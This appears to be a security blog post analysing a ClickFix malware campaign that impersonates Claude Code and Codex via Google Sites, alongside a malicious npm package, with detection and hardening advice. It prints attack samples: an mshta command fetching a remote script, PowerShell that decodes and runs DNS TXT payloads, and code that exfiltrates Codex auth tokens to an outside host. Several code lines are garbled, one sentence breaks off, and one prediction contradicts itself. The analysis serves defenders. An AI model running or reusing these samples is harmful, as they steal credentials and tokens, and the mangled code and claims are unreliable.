Listen to this Post
Introduction:
The explosion of AI coding assistants such as Anthropic’s Claude Code has opened a new frontier for financially motivated cybercrime. In a campaign first detected in early March 2026, threat actors have been leveraging trusted Google Sites infrastructure to distribute a fileless ClickFix malware, impersonating both Claude Code and OpenAI Codex. By using social engineering that mimics official CAPTCHA or installation guides, developers are tricked into pasting malicious PowerShell commands, which execute an advanced in‑memory stealer that harvests browser credentials, session tokens, cryptocurrency wallets, and even CI/CD secrets—without writing a single malicious file to disk.
Learning Objectives:
– Objective 1: Analyze the multi‑stage ClickFix attack chain, including its abuse of Google Sites, SEO poisoning, and the use of steganography and server‑side polymorphism to evade detection.
– Objective 2: Implement effective detection and prevention measures on Linux and Windows systems, leveraging YARA rules, PowerShell logging, DNS monitoring, and application whitelisting.
– Objective 3: Apply secure development workflows to vet AI tools and npm packages, using techniques such as dependency scanning, token monitoring, and code analysis to block supply‑chain compromises.
You Should Know:
1. Anatomy of the Attack: From Google Search to Fileless Infostealer Execution
The attack chain begins when a developer searches for “Claude Code install” or “Gemini CLI setup.” Through SEO poisoning and malvertising, the victim is directed to a fake page—often hosted on Google Sites (e.g., `sites[.]google[.]com/view/cloud-version-08`)—that is a near‑perfect replica of the legitimate installation guide. The page displays a convincing “Verify you are human” CAPTCHA or a setup instruction that tricks the user into copying a command that has already been placed in their clipboard. On Windows, the typical command uses `mshta.exe` to run a JScript script from a remote server:
mshta.exe javascript:open('http:<attacker-server>/a.cmd','','width=0,height=0');close();
When executed, this command triggers a hidden PowerShell process that downloads and runs a highly obfuscated script entirely in memory. Advanced variants have been observed using DNS TXT records to retrieve the next‑stage payload, blending with legitimate network traffic. A typical DNS‑based script might look like this:
ClickFix DNS TXT payload retrieval (observed in KongTuke campaign) $domain = "malicious-site[.]com" $txt = (Resolve-DnsName -1ame $domain -Type TXT).Strings iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($txt[bash])))
Once loaded, the final PowerShell script disables Event Tracing for Windows (ETW) to evade logging, bypasses the Antimalware Scan Interface (AMSI), and loads a C‑based infostealer. This stealer reads saved credentials from Chromium‑based browsers, extracts session cookies from Slack, Microsoft Teams, Discord, and Telegram, and dumps the contents of cryptocurrency wallets. All stolen data is XOR‑encrypted and exfiltrated to a command‑and‑control server such as `events[.]ms709[.]com`.
How to use this information:
– Monitoring: Use Sysmon or PowerShell script block logging to detect suspicious `Resolve-DnsName` calls.
– Prevention: Disable `mshta.exe` execution via AppLocker or Windows Defender Application Control.
– Command to detect unusual mshta activity (Windows Event Log 4688, 1):
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; Data='mshta.exe'} |
Where-Object { $_.Message -match "javascript:" }
2. Server‑Side Polymorphism: Why Signature‑Based AV Fails
One of the most sophisticated features of this campaign is server‑side polymorphism. When a victim clicks the fake CAPTCHA, the attacker’s server dynamically generates a unique, obfuscated PowerShell payload for each request. The server randomly chooses between XOR encryption (with a key like `”RoSvbP”`) and Base64 + Deflate compression. Because every payload is different, static file hashes become useless for detection.
A typical XOR‑encrypted payload is delivered as a large block of hex data, which is then decrypted byte‑by‑byte and executed with `
::Create()`. Conversely, the Base64 variant decodes the string, decompresses it via `[IO.Compression.DeflateStream]`, and runs it in an isolated runspace using `Pipeline.Invoke()`.
[bash]
Simplified example of the XOR decryption routine observed
$enc = "4142434445464748494A4B..." hex payload
$key = "RoSvbP"
$bytes = [System.Convert]::FromHexString($enc)
for ($i=0; $i -lt $bytes.Count; $i++) {
$bytes[$i] = $bytes[$i] -bxor [bash][char]$key[$i % $key.Length]
}
$script = [System.Text.Encoding]::UTF8.GetString($bytes)
iex $script
Step‑by‑step guide to detect server‑side polymorphism:
1. Enable PowerShell Module Logging (Windows) – via Group Policy: Administrative Templates → Windows Components → Windows PowerShell → Turn on Module Logging.
2. Collect all executed PowerShell script content using `Get-WinEvent -LogName “Windows PowerShell”` and search for large hex strings or calls to `
::Create()`.
3. Deploy a YARA rule targeting the HTML structure of the fake landing pages. ReversingLabs reported that a single YARA rule matched 283 samples, of which 173 (61%) had zero antivirus detection at the time of analysis.
<h2 style="color: yellow;">Example YARA rule snippet (based on ReversingLabs research):</h2>
[bash]
rule WIN_ClickFix_HTML_Heuristic {
meta:
description = "Detects ClickFix CAPTCHA HTML structure"
strings:
$js_clip = /onclick.clipboard\.writeText/ nocase
$powershell_cmd = /powershell\s+\-e\s+[A-Za-z0-9\+\/=]{16,}/ nocase
$fake_captcha = /display.verify\s+human/ nocase
condition:
$js_clip and $powershell_cmd and $fake_captcha
}
3. Linux Hardening & Detection for Cross‑Platform ClickFix Variants
Although the primary ClickFix campaign targets Windows, macOS variants have been observed using similar tactics. Attackers use malvertising to lure Mac users to fake Claude Code pages, then instruct them to run a `curl-to-bash` command that installs an info‑stealer like MacSync. This malware harvests iCloud keychain data, browser passwords, and crypto wallets.
To protect Linux and macOS workstations:
– Always install software through official package managers. For Claude Code on Linux, the legitimate installation uses npm:
npm install -g @anthropic-ai/claude-code
– Never run commands from untrusted websites that ask you to paste them directly into your terminal.
– Use `curl` with caution. If a page asks you to run `curl
curl -s <URL> | less
– Monitor process execution on Linux with auditd. Log suspicious parent‑child relationships (e.g., browser spawning `curl` or `bash`):
auditctl -a always,exit -F arch=b64 -S execve -k process_monitoring
– Deploy a custom bash wrapper that intercepts dangerous patterns. For example, add the following to `/etc/profile`:
shopt -s histverify shopt -s histappend Log every command executed from bash history export PROMPT_COMMAND="history -a; logger -p user.notice \"\$USER ran \$(history 1 | cut -c 8-)\""
4. Supply Chain Attacks via npm: The OpenClaw Example
Beyond the ClickFix technique, attackers have also compromised the software supply chain directly. A malicious npm package named `codexui-android`, designed to look like a legitimate remote UI for OpenAI Codex, was downloaded over 29,000 times weekly. The GitHub repository remained clean—the malicious code was injected only into the version published on npm. When a developer ran the tool, it read the `auth.json` file from the Codex home directory, XOR‑encrypted its contents using the key `”anyclaw2026″`, and sent it to `sentry.anyclaw[.]store/startlog`. Crucially, the stolen refresh token does not expire, allowing an attacker to permanently impersonate the victim.
// Excerpt of the malicious chunk-PUR7OUAG.js file (simplified)
const fs = require('fs');
const path = require('path');
const crypto = require('crypto');
function xorEncrypt(data, key) {
let result = '';
for (let i = 0; i < data.length; i++) {
result += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
}
return result;
}
const authPath = path.join(process.env.HOME, '.codex', 'auth.json');
if (fs.existsSync(authPath)) {
const tokens = fs.readFileSync(authPath, 'utf8');
const encrypted = xorEncrypt(tokens, 'anyclaw2026');
const base64 = Buffer.from(encrypted).toString('base64');
// Exfiltrate to attacker server
require('https').get(`https://sentry.anyclaw.store/startlog?data=${base64}`);
}
To defend against such supply‑chain attacks:
– Use `npm audit` and `npm doctor` to check for known vulnerabilities.
– Pin exact package versions (`npm install –save-exact`).
– Monitor for unexpected network connections from Node.js processes.
– Implement a private npm registry that scans all packages for patterns like XOR encryption of credential files.
5. Cloud Hardening & API Security for AI Development Environments
Once a developer’s workstation is compromised, attackers often pivot to cloud resources and CI/CD pipelines. The harvested OAuth tokens and session keys can be used to access AWS, Azure, or GCP environments, where they can exfiltrate source code or spin up cryptominers. To protect cloud‑based AI tooling:
– Rotate API keys frequently – do not rely on non‑expiring tokens.
– Enforce multi‑factor authentication (MFA) for all cloud consoles and CI/CD tools.
– Restrict permissions using the principle of least privilege. For example, a Codex agent should only have read access to the repositories it needs, not admin rights.
– Monitor for anomalous API calls using cloud audit logs. On AWS, an unusual pattern would be a `GetSecretValue` call from a previously unseen IP address:
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \ --start-time $(date -d "1 hour ago" -u +"%Y-%m-%dT%H:%M:%SZ")
– Deploy a Cloud Security Posture Management (CSPM) tool that detects overprivileged IAM roles and unused credentials.
6. Vulnerability Exploitation & Mitigation: From Stealer to Ransomware
While the primary goal of this campaign is credential theft, the infostealer provides arbitrary remote code execution capabilities. This means an attacker can later download and execute additional payloads—such as ransomware or a remote access trojan (RAT). EclecticIQ observed that the malware includes a “hands‑on‑keyboard” backdoor that allows interactive commands.
To mitigate this risk:
– Segment your network: Place developer workstations in a separate VLAN with strict outbound firewall rules.
– Use application control (AppLocker or `auditctl` on Linux) to block execution of unknown binaries.
– Implement endpoint detection and response (EDR) with behavioral analysis, not just signature matching.
– Prepare an incident response plan that includes resetting all compromised tokens and credentials, not just the ones that were explicitly stolen.
What Undercode Say:
– Key Takeaway 1: Trusted platforms like Google Sites and legitimate npm packages are being weaponized to deliver fileless malware. The use of steganography, DNS TXT records, and server‑side polymorphism makes traditional antivirus nearly obsolete.
– Key Takeaway 2: The attack surface is expanding to include AI tools, which developers adopt with high trust and low scrutiny. A single developer’s machine can become the entry point for a full enterprise‑wide breach, leading to stolen API credits, CI/CD secrets, and even long‑term account impersonation via non‑expiring refresh tokens.
Analysis: The ClickFix campaign represents a dangerous evolution in social engineering, blending technical sophistication with psychological manipulation. By abusing the trust placed in Google Sites and AI tooling, attackers bypass both technical controls and human skepticism. The shift from disk‑based to memory‑only execution, combined with server‑side polymorphism, creates a detection gap that leaves many organizations blind. Defenders must adopt a multi‑layered approach: enforce endpoint logging, deploy behavioral YARA rules, educate developers to never run commands from untrusted sources, and continuously monitor for anomalous PowerShell activity. The use of non‑expiring tokens in AI ecosystems (e.g., OpenAI Codex) is a ticking time bomb; organizations should push for short‑lived tokens and regular rotation as a standard security control.
Prediction:
– +1 The ClickFix technique will be further automated through AI‑powered polymorphic generators, making each payload completely unique. This will drive increased adoption of behavioral detection systems and zero‑trust network architectures.
– -1 As attackers refine fileless methods, the median time to detect (MTTD) for infostealer campaigns will drop below 10 minutes for organizations without EDR, but will remain over 72 hours for those relying solely on antivirus.
– +1 In response, security vendors will integrate large language models into their detection stacks, using natural‑language processing to understand the intent of obfuscated scripts, leading to a new class of AI‑based anti‑malware engines.
– -1 The abuse of trusted platforms (Google Sites, npm, GitHub) will continue to grow, and users will become desensitized to warnings, further lowering the bar for social engineering success.
– -1 The non‑expiring refresh token vulnerability will be exploited in at least three major SaaS breaches by Q3 2026, prompting emergency updates from OpenAI and other AI providers to enforce token expiry policies.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Varshu25 Google](https://www.linkedin.com/posts/varshu25_google-sites-hosted-claude-code-impersonation-share-7468542865468469248-sYXn/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
